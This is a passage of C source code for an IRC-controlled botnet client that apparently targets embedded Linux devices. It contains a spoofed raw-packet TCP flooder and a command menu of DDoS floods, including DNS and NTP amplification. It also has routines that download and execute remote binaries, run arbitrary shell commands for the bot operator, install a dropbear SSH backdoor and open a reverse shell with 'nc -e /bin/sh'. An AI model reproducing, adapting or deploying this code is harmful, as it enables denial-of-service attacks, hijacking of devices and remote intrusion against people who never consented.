  2498. int getHost(unsigned char *toGet, struct in_addr *i) {
  2499. struct hostent *h;
  2500. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  2501. return 0;
  2502. }
  2503.  
  2504. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
  2505. iph->ihl = 5;
  2506. iph->version = 4;
  2507. iph->tos = 0;
  2508. iph->tot_len = sizeof(struct iphdr) + packetSize;
  2509. iph->id = rand_cmwc();
  2510. iph->frag_off = 0;
  2511. iph->ttl = MAXTTL;
  2512. iph->protocol = protocol;
  2513. iph->check = 0;
  2514. iph->saddr = source;
  2515. iph->daddr = dest;
  2516. }
  2517.  
  2518. void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
  2519. register unsigned int pollRegister;
  2520. pollRegister = pollinterval;
  2521. struct sockaddr_in dest_addr;
  2522. dest_addr.sin_family = AF_INET;
  2523. if(port == 0) dest_addr.sin_port = rand_cmwc();
  2524. else dest_addr.sin_port = htons(port);
  2525. if(getHost(target, &dest_addr.sin_addr)) return;
  2526. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2527. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  2528. if(!sockfd) { return; }
  2529. int tmp = 1;
  2530. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
  2531. in_addr_t netmask;
  2532. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  2533. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  2534. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  2535. struct iphdr *iph = (struct iphdr *)packet;
  2536. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  2537. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomPublicIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  2538. tcph->source = rand_cmwc();
  2539. tcph->seq = rand_cmwc();
  2540. tcph->ack_seq = 0;
  2541. tcph->doff = 5;
  2542. if(!strcmp(flags, "all")) {
  2543. tcph->syn = 1;
  2544. tcph->rst = 1;
  2545. tcph->fin = 1;
  2546. tcph->ack = 1;
  2547. tcph->psh = 1;
  2548. } else {
  2549. unsigned char *pch = strtok(flags, ",");
  2550. while(pch) {
  2551. if(!strcmp(pch, "syn")) { tcph->syn = 1;
  2552. } else if(!strcmp(pch, "rst")) { tcph->rst = 1;
  2553. } else if(!strcmp(pch, "fin")) { tcph->fin = 1;
  2554. } else if(!strcmp(pch, "ack")) { tcph->ack = 1;
  2555. } else if(!strcmp(pch, "psh")) { tcph->psh = 1;
  2556. } else {
  2557. }
  2558. pch = strtok(NULL, ",");
  2559. }
  2560. }
  2561. tcph->window = rand_cmwc();
  2562. tcph->check = 0;
  2563. tcph->urg_ptr = 0;
  2564. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2565. tcph->check = ccsum(iph, tcph);
  2566. iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
  2567. int end = time(NULL) + timeEnd;
  2568. register unsigned int i = 0;
  2569. while(1) {
  2570. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2571. iph->saddr = htonl( getRandomPublicIP(netmask) );
  2572. iph->id = rand_cmwc();
  2573. tcph->seq = rand_cmwc();
  2574. tcph->source = rand_cmwc();
  2575. tcph->check = 0;
  2576. tcph->check = ccsum(iph, tcph);
  2577. iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
  2578. if(i == pollRegister) {
  2579. if(time(NULL) > end) break;
  2580. i = 0;
  2581. continue;
  2582. }
  2583. i++;
  2584. }
  2585. }
  2586.  
  2587. void tcpflood(int sock, char *sender, int argc, char **argv) {
  2588. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1)) {
  2589. Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender);
  2590. return;
  2591. }
  2592. if (mfork(sender) != 0) return;
  2593. unsigned char *ip = argv[1];
  2594. int port = atoi(argv[2]);
  2595. int time = atoi(argv[3]);
  2596. unsigned char *flags = argv[4];
  2597. int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
  2598. int packetsize = argc > 5 ? atoi(argv[5]) : 0;
  2599. int spoofed = 32;
  2600. if(strstr(ip, ",") != NULL) {
  2601. unsigned char *hi = strtok(ip, ",");
  2602. while(hi != NULL) {
  2603. if(!listFork()) {
  2604. Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, hi, port, flags);
  2605. SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
  2606. _exit(0);
  2607. }
  2608. hi = strtok(NULL, ",");
  2609. }
  2610. } else {
  2611. if (listFork()) {
  2612. return;
  2613. }
  2614. Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, ip, port, flags);
  2615. SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
  2616. _exit(0);
  2617. }
  2618. }
  2619.  
  2620. void update(int sock, char *sender, int argc, char **argv) {
  2621. int sock2,i,d;
  2622. struct sockaddr_in server;
  2623. unsigned long ipaddr;
  2624. unsigned char dgcc;
  2625. char buf[1024], *file;
  2626. FILE *gcc;
  2627. int parent=getpid();
  2628. if (mfork(sender) != 0) return;
  2629. if (argc < 2) {
  2630. Send(sock, "NOTICE %s :UPDATEHTTP <host> <src:bin>\n", sender);
  2631. exit(0);
  2632. }
  2633. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  2634. Send(sock, "NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n", sender);
  2635. exit(0);
  2636. }
  2637. server.sin_family = AF_INET;
  2638. server.sin_port = htons(80);
  2639. if ((ipaddr = inet_addr(argv[1])) == -1) {
  2640. struct hostent *hostm;
  2641. if ((hostm=gethostbyname(argv[1])) == NULL) {
  2642. Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
  2643. exit(0);
  2644. }
  2645. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  2646. }
  2647. else server.sin_addr.s_addr = ipaddr;
  2648. memset(&(server.sin_zero), 0, 8);
  2649. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  2650. Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
  2651. exit(0);
  2652. }
  2653.  
  2654. gcc=popen("gcc --help","r");
  2655. if (gcc != NULL) {
  2656. memset(buf,0,1024);
  2657. fgets(buf,1024,gcc);
  2658. if (!strstr(buf,"Usage")) dgcc=0;
  2659. else dgcc=1;
  2660. pclose(gcc);
  2661. } else dgcc=0;
  2662.  
  2663. for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);
  2664. argv[2][i]=0;
  2665. if (dgcc) file=argv[2];
  2666. else file=argv[2]+i+1;
  2667.  
  2668. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
  2669. Send(sock, "NOTICE %s :Receiving update.\n", sender);
  2670. system("mkdir /tmp");
  2671. if (dgcc) {
  2672. FILE *file=fopen("/tmp/.c","wb");
  2673. char bufm[4096];
  2674. while(1) {
  2675. int i;
  2676. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2677. if (i < 4096) bufm[i]=0;
  2678. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  2679. for (d+=4;d<i;d++) fputc(bufm[d],file);
  2680. goto done;
  2681. }
  2682. }
  2683. done:
  2684. while(1) {
  2685. int i;
  2686. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2687. if (i < 4096) bufm[i]=0;
  2688. for (d=0;d<i;d++) fputc(bufm[d],file);
  2689. }
  2690. fclose(file);
  2691. memset(buf,0,4096);
  2692. sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
  2693. }
  2694. else {
  2695. FILE *file=fopen("/tmp/.o","wb");
  2696. unsigned char bufm[4096];
  2697. while(1) {
  2698. int i;
  2699. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2700. if (i < 4096) bufm[i]=0;
  2701. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  2702. for (d+=4;d<i;d++) fputc(bufm[d],file);
  2703. goto done2;
  2704. }
  2705. }
  2706. done2:
  2707. while(1) {
  2708. int i,d;
  2709. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2710. if (i < 4096) bufm[i]=0;
  2711. for (d=0;d<i;d++) fputc(bufm[d],file);
  2712. }
  2713. fclose(file);
  2714. memset(buf,0,4096);
  2715. //sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);
  2716. //sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");
  2717. sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");
  2718. }
  2719. close(sock);
  2720. close(sock2);
  2721. system(buf);
  2722. kill(9,0);
  2723. exit(0);
  2724. }
  2725.  
  2726.  
  2727. void move(int sock, char *sender, int argc, char **argv) {
  2728. if (argc < 1) {
  2729. Send(sock, "NOTICE %s :MOVE <server>\n", sender);
  2730. exit(1);
  2731. }
  2732. server=strdup(argv[1]);
  2733. changeservers=1;
  2734. close(sock);
  2735. }
  2736.  
  2737. void hackpkg(int sock, char *sender, int argc, char **argv) {
  2738. int sock2,i,d;
  2739. struct sockaddr_in server;
  2740. unsigned long ipaddr;
  2741. char buf[1024];
  2742. FILE *file;
  2743. mkdir("/var/bin", 0775);
  2744. unsigned char bufm[4096];
  2745. if (mfork(sender) != 0) return;
  2746. if (argc < 2) {
  2747. Send(sock, "NOTICE %s :HACKPGK <url> <binary name>\n", sender);
  2748. exit(0);
  2749. }
  2750. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  2751. Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
  2752. exit(0);
  2753. }
  2754. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  2755. else strcpy(buf,argv[1]);
  2756. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  2757. buf[i]=0;
  2758. server.sin_family = AF_INET;
  2759. server.sin_port = htons(80);
  2760. if ((ipaddr = inet_addr(buf)) == -1) {
  2761. struct hostent *hostm;
  2762. if ((hostm=gethostbyname(buf)) == NULL) {
  2763. Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
  2764. exit(0);
  2765. }
  2766. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  2767. }
  2768. else server.sin_addr.s_addr = ipaddr;
  2769. memset(&(server.sin_zero), 0, 8);
  2770. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  2771. Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
  2772. exit(0);
  2773. }
  2774.  
  2775. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  2776. Send(sock, "NOTICE %s :Receiving file.\n", sender);
  2777. file=fopen(argv[2],"wb");
  2778. while(1) {
  2779. int i;
  2780. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2781. if (i < 4096) bufm[i]=0;
  2782. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  2783. for (d+=4;d<i;d++) fputc(bufm[d],file);
  2784. goto done;
  2785. }
  2786. }
  2787. done:
  2788. Send(sock, "NOTICE %s :Installed %s to hack path.\n", sender,argv[2]);
  2789. while(1) {
  2790. int i,d;
  2791. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  2792. if (i < 4096) bufm[i]=0;
  2793. for (d=0;d<i;d++) fputc(bufm[d],file);
  2794. }
  2795. fclose(file);
  2796. close(sock2);
  2797. char MoveIt[255];
  2798. sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);
  2799. system(MoveIt);
  2800. char DeleteIt[255];
  2801. sprintf(DeleteIt, "rm %s",argv[2],argv[2]);
  2802. system(DeleteIt);
  2803. char String[255];
  2804. sprintf(String, "chmod 775 /var/bin/%s",argv[2]);
  2805. system(String);
  2806. char String2[255];
  2807. sprintf(String2, "ls -l /var/bin/%s",argv[2]);
  2808. system(String2);
  2809. exit(0);
  2810. }
  2811.  
  2812. void help(int sock, char *sender, int argc, char **argv) {
  2813. if (mfork(sender) != 0) return;
  2814. Send(sock, "NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n", sender); sleep(1);
  2815. Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender); sleep(1);
  2816. Send(sock, "NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n", sender); sleep(1);
  2817. Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
  2818. Send(sock, "NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n", sender); sleep(1);
  2819. Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender); sleep(1);
  2820. Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender); sleep(1);
  2821. Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>\n", sender); sleep(1);
  2822. Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender); sleep(1);
  2823. Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender); sleep(1);
  2824. Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
  2825. Send(sock, "NOTICE %s :NICK <nick> = Changes the nick of the client\n", sender); sleep(1);
  2826. Send(sock, "NOTICE %s :SERVER <server> = Changes servers\n", sender); sleep(1);
  2827. Send(sock, "NOTICE %s :GETSPOOFS = Gets the current spoofing\n", sender); sleep(1);
  2828. Send(sock, "NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n", sender); sleep(1);
  2829.  
  2830. Send(sock, "NOTICE %s :DISABLE = Disables all packeting from this client\n", sender); sleep(1);
  2831. Send(sock, "NOTICE %s :ENABLE = Enables all packeting from this client\n", sender); sleep(1);
  2832.  
  2833. Send(sock, "NOTICE %s :KILL = Kills the client\n", sender); sleep(1);
  2834. Send(sock, "NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n", sender); sleep(1);
  2835. Send(sock, "NOTICE %s :UPDATE <http address> <src:bin> = Update this bot\n", sender); sleep(1);
  2836. Send(sock, "NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n", sender); sleep(1);
  2837. Send(sock, "NOTICE %s :VERSION = Requests version of client\n", sender); sleep(1);
  2838. Send(sock, "NOTICE %s :KILLALL = Kills all current packeting\n", sender); sleep(1);
  2839. Send(sock, "NOTICE %s :HELP = Displays this\n", sender); sleep(1);
  2840.  
  2841. Send(sock, "NOTICE %s :IRC <command> = Sends this command to the server\n", sender); sleep(1);
  2842. Send(sock, "NOTICE %s :SH <command> = Executes a command\n", sender); sleep(1);
  2843. Send(sock, "NOTICE %s :ISH <command> = SH, interactive, sends to channel\n", sender); sleep(1);
  2844. Send(sock, "NOTICE %s :SHD <command> = Executes a psuedo-daemonized command\n", sender); sleep(1);
  2845. Send(sock, "NOTICE %s :GETBB <tftp server> = Get a proper busybox\n", sender); sleep(1);
  2846.  
  2847. Send(sock, "NOTICE %s :INSTALL <http server/file_name> = Download & install a binary to /var/bin \n", sender); sleep(1);
  2848. Send(sock, "NOTICE %s :BASH <cmd> = Execute commands using bash. \n", sender); sleep(1);
  2849. Send(sock, "NOTICE %s :BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n", sender); sleep(1);
  2850. Send(sock, "NOTICE %s :SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n", sender); sleep(1);
  2851. Send(sock, "NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n", sender); sleep(1);
  2852. Send(sock, "NOTICE %s :LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n", sender); sleep(1);
  2853. Send(sock, "NOTICE %s :GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n", sender); sleep(1);
  2854. exit(0);
  2855. }
  2856. void killall(int sock, char *sender, int argc, char **argv) {
  2857. unsigned long i;
  2858. for (i=0;i<numpids;i++) {
  2859. if (pids[i] != 0 && pids[i] != getpid()) {
  2860. if (sender) Send(sock, "NOTICE %s :Killing pid %d.\n", sender,pids[i]);
  2861. kill(pids[i],9);
  2862. }
  2863. }
  2864. }
  2865.  
  2866. void killd(int sock, char *sender, int argc, char **argv) {
  2867. char buf[1024]={0};
  2868. if (disabled == 1) return;
  2869. sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
  2870. system(buf);
  2871. exit(0);
  2872.  
  2873. }
  2874. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  2875. { "PAN", pan },
  2876. { "TCP", tcpflood },
  2877. { "STD", sendSTD },
  2878. { "UDP", udp },
  2879. { "UNKNOWN", unknown },
  2880. { "HTTPFLOOD", sendHTTP },
  2881. { "NTP", ntp },
  2882. { "BLACKNURSE", blacknurse },
  2883. { "DNSAMP", dnsamp },
  2884. { "QUAKE3", quake3 },
  2885. { "PROXYFLUX", proxyflux },
  2886. { "NICK", nickc },
  2887. { "SERVER", move },
  2888. { "GETSPOOFS", getspoofs },
  2889. { "SPOOFS", spoof },
  2890. { "HACKPKG", hackpkg },
  2891. { "DISABLE", disable },
  2892. { "ENABLE", enable },
  2893. { "UPDATE", update },
  2894. { "KILL", killd },
  2895. { "GET", get },
  2896. { "VERSION", version },
  2897. { "KILLALL", killall },
  2898. { "HELP", help },
  2899. { (char *)0, (void (*)(int,char *,int,char **))0 } };
  2900. void _PRIVMSG(int sock, char *sender, char *str) {
  2901. int i;
  2902. char *to, *message;
  2903. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  2904. str[i]=0;
  2905. to=str;
  2906. message=str+i+2;
  2907. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  2908. sender[i]=0;
  2909. if (*message == '!' && !strcasecmp(to,chan)) {
  2910. char *params[12], name[1024]={0};
  2911. int num_params=0, m;
  2912. message++;
  2913. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  2914. message[i]=0;
  2915. if (strwildmatch(message,nick)) return;
  2916. message+=i+1;
  2917. if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock, "NOTICE %s :Unable to comply.\n", sender); else Send(sock, "%s\n",message+4);
  2918. if (!strncmp(message,"SH ",3)) {
  2919. char buf[1024];
  2920. FILE *command;
  2921. if (mfork(sender) != 0) return;
  2922. memset(buf,0,1024);
  2923. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
  2924. command=popen(buf,"r");
  2925. while(!feof(command)) {
  2926. memset(buf,0,1024);
  2927. fgets(buf,1024,command);
  2928. Send(sock, "NOTICE %s :%s\n", sender,buf);
  2929. sleep(1);
  2930. }
  2931. pclose(command);
  2932. exit(0);
  2933. }
  2934.  
  2935.  
  2936. // SHD (daemonize sh command)
  2937. if (!strncmp(message,"SHD ",4)) {
  2938. char buf[1024];
  2939. FILE *command;
  2940. if (mfork(sender) != 0) return;
  2941. memset(buf,0,1024);
  2942. sprintf(buf,"export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);
  2943. command=popen(buf,"r");
  2944. while(!feof(command)) {
  2945. memset(buf,0,1024);
  2946. fgets(buf,1024,command);
  2947. Send(sock, "NOTICE %s :%s\n", sender,buf);
  2948. sleep(1);
  2949. }
  2950. pclose(command);
  2951. exit(0);
  2952. }
  2953.  
  2954. // GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like eliminate (in this case tftp). We really want to have the c program handle as much of thse custom funcs as possile. I am not graet with c, but proficient with linux, so i added these.
  2955. if (!strncmp(message,"GETBB ",6)) {
  2956. char buf[1024];
  2957. FILE *command;
  2958. if (mfork(sender) != 0) return;
  2959. memset(buf,0,1024);
  2960. sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);
  2961. command=popen(buf,"r");
  2962. while(!feof(command)) {
  2963. memset(buf,0,1024);
  2964. fgets(buf,1024,command);
  2965. Send(sock, "NOTICE %s :%s\n", sender,buf);
  2966. sleep(1);
  2967. }
  2968. pclose(command);
  2969. exit(0);
  2970. }
  2971.  
  2972.  
  2973. // GETSSH (download, install, start dropbear, requires busybox for wget, mv, somet other things that are not always present on embedded devices
  2974. if (!strncmp(message,"GETSSH ",7)) {
  2975. char buf[1024];
  2976. FILE *command;
  2977. if (mfork(sender) != 0) return;
  2978. memset(buf,0,1024);
  2979. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);
  2980. command=popen(buf,"r");
  2981. while(!feof(command)) {
  2982. memset(buf,0,1024);
  2983. fgets(buf,1024,command);
  2984. Send(sock, "NOTICE %s :%s\n", sender,buf);
  2985. sleep(1);
  2986. }
  2987. pclose(command);
  2988. exit(0);
  2989. }
  2990.  
  2991.  
  2992. // INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use taht instead of needing to download busybox/wget first
  2993.  
  2994. if (!strncmp(message,"INSTALL ",8)) {
  2995. char buf[1024];
  2996. FILE *command;
  2997. if (mfork(sender) != 0) return;
  2998. memset(buf,0,1024);
  2999. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);
  3000. command=popen(buf,"r");
  3001. while(!feof(command)) {
  3002. memset(buf,0,1024);
  3003. fgets(buf,1024,command);
  3004. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3005. sleep(1);
  3006. }
  3007. pclose(command);
  3008. exit(0);
  3009. }
  3010.  
  3011.  
  3012. // BINUPDATE http://server/file (like install, but updates the program)
  3013.  
  3014. if (!strncmp(message,"BINUPDATE ",10)) {
  3015. char buf[1024];
  3016. FILE *command;
  3017. if (mfork(sender) != 0) return;
  3018. memset(buf,0,1024);
  3019. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);
  3020. command=popen(buf,"r");
  3021. while(!feof(command)) {
  3022. memset(buf,0,1024);
  3023. fgets(buf,1024,command);
  3024. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3025. sleep(1);
  3026. }
  3027. pclose(command);
  3028. exit(0);
  3029. }
  3030.  
  3031. // LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to elimiate the dependency
  3032.  
  3033. if (!strncmp(message,"LOCKUP ",7)) {
  3034. char buf[1024];
  3035. FILE *command;
  3036. if (mfork(sender) != 0) return;
  3037. memset(buf,0,1024);
  3038. sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);
  3039. command=popen(buf,"r");
  3040. while(!feof(command)) {
  3041. memset(buf,0,1024);
  3042. fgets(buf,1024,command);
  3043. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3044. sleep(1);
  3045. }
  3046. pclose(command);
  3047. exit(0);
  3048. }
  3049.  
  3050. // !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverese shell functiomn to eliminiate taht dependency
  3051. if (!strncmp(message,"RSHELL ",6)) {
  3052. char buf[1024];
  3053. FILE *command;
  3054. if (mfork(sender) != 0) return;
  3055. memset(buf,0,1024);
  3056. sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);
  3057. command=popen(buf,"r");
  3058. while(!feof(command)) {
  3059. memset(buf,0,1024);
  3060. fgets(buf,1024,command);
  3061. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3062. sleep(1);
  3063. }
  3064. pclose(command);
  3065. exit(0);
  3066. }
  3067.  
  3068. //SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server
  3069. if (!strncmp(message,"SCAN ",5)) {
  3070. char buf[1024];
  3071. FILE *command;
  3072. if (mfork(sender) != 0) return;
  3073. memset(buf,0,1024);
  3074. sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);
  3075. command=popen(buf,"r");
  3076. while(!feof(command)) {
  3077. memset(buf,0,1024);
  3078. fgets(buf,1024,command);
  3079. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3080. sleep(1);
  3081. }
  3082. pclose(command);
  3083. exit(0);
  3084. }
  3085.  
  3086. // !* BASH echo hello
  3087. if (!strncmp(message,"BASH ",5)) {
  3088. char buf[1024];
  3089. FILE *command;
  3090. if (mfork(sender) != 0) return;
  3091. memset(buf,0,1024);
  3092. sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);
  3093. command=popen(buf,"r");
  3094. while(!feof(command)) {
  3095. memset(buf,0,1024);
  3096. fgets(buf,1024,command);
  3097. Send(sock, "NOTICE %s :%s\n", sender,buf);
  3098. sleep(1);
  3099. }
  3100. pclose(command);
  3101. exit(0);
  3102.  
  3103. }
  3104.  
  3105. m=strlen(message);
  3106. for (i=0;i<m;i++) {
  3107. if (*message == ' ' || *message == 0) break;
  3108. name[i]=*message;
  3109. message++;
  3110. }
  3111. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
  3112. num_params++;
  3113. if (num_params > 10) num_params=10;
  3114. params[0]=name;
  3115. params[num_params+1]="\0";
  3116. m=1;
  3117. while (*message != 0) {
  3118. message++;
  3119. if (m >= num_params) break;
  3120. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  3121. params[m]=(char*)malloc(i+1);
